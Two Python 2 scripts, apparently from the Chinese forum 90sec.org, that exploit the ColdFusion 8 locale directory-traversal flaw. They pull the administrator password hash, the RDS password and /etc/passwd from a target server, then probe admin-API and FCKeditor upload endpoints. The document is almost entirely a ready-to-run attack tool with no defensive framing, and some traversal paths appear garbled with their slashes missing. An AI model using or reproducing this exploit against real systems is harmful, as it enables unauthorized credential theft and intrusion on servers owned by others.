Coldfusion8 读取HASH工具

#!/usr/bin/env python
#-*- coding:utf-8 -*-
import sys
import threading
import urllib
import httplib
class Mythread(threading.Thread):
        def __init__(self,host):
            threading.Thread.__init__(self)
            self.host = host
        def run(self):
            urls = ['/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..............libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=............libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..........libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=........libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=......libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=....libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=..........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en',
                '/CFIDE/administrator/enter.cfm?locale=....JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
                '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libetcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=................etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..............etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=............etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=..........etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=........etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=......etcpasswd%00en',
                '/CFIDE/administrator/enter.cfm?locale=....etcpasswd%00en']
            try:
                for path in urls:
                    out = urllib.urlopen(self.host + path).read().split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '
').replace(r'encrypted=true', '
')
                    print out
            except Exception:
                print "Error connect time"
            self.scanner()
        def scanner(self):
            #self.host = host
            cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm',
            '/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm',
            '/CFIDE/adminapi/_datasource/geturldefaults.cfm',
            '/CFIDE/adminapi/_datasource/setdsn.cfm',
            '/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm',
            '/CFIDE/adminapi/_datasource/setsldatasource.cfm',
            '/CFIDE/adminapi/customtags/l10n.cfm',
            '/CFIDE/debug/cf_debugFr.cfm',
            '/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']

            i_headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain"}

            for fckpath in cfmfck:
                if self.host[0:8] == "https://":
                    conn = httplib.HTTPSConnection(self.host.replace("https://",""))
                else:
                    conn = httplib.HTTPConnection(self.host.replace("http://",""))
                conn.request('GET',fckpath,headers = i_headers)
                r1 = conn.getresponse()

                if r1.status == 200 or r1.status == 500 or r1.status == 403:
                    print self.host + fckpath + "   " + str(r1.status)


if __name__ == "__main__":
    Mythread(sys.argv[1]).start()

#!/usr/bin/env python
# -*- coding: utf8 -*- 
import sys , urllib , httplib , subprocess
def banner():
    print """
#--------------------------------------------------#
#       Welcome to www.90sec.org                   #
#        THis is read ColdFusion sha1 Tool         #
#       python COldFusion.py www.WebSite.cn        #
#--------------------------------------------------#
"""
urls = ['/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=................libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=..............libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=............libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=..........libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=........libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=......libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=....libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=................CFusionMXlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=................CFusionMX7libpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=....................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=..................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=................JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=..............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=............JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=..........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=........JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=....JRun4serverscfusioncfusion-earcfusion-warWEB-INFcfusionlibpassword.properties%00en',
       '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8libetcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=................ColdFusion8etcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=................etcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=..............etcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=............etcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=..........etcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=........etcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=......etcpasswd%00en',
       '/CFIDE/administrator/enter.cfm?locale=....etcpasswd%00en']

cfmfck = ['/CFIDE/adminapi/_datasource/formatjdbcurl.cfm','/CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm','/CFIDE/adminapi/_datasource/geturldefaults.cfm','/CFIDE/adminapi/_datasource/setdsn.cfm','/CFIDE/adminapi/_datasource/setmsaccessregistry.cfm','/CFIDE/adminapi/_datasource/setsldatasource.cfm','/CFIDE/adminapi/customtags/l10n.cfm','/CFIDE/debug/cf_debugFr.cfm','/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm']
try:
    host = sys.argv[1]
    if len(host) < '0':
        banner()
    for url in urls:
        context = urllib.urlopen(host + url).read()
        out = context.split(r'</title>')[0].split(r'<title>')[1].replace(r'rdspassword=', '
').replace(r'encrypted=true', '
')
        print out

except Exception:
    banner()
    sys.exit()

else:
      for line in cfmfck:
            host = host.replace("http://","")
            line = line.replace("
","")
            line = "/" + line
            website = host + line
            connection = httplib.HTTPConnection(host)
            connection.request("GET",line)
            response = connection.getresponse()
            if response.status == 200:
                  print website , '200'
            elif response.status == 403:
                  print website , '403'
            elif response.status == 500:
              print website , 'server ERROR'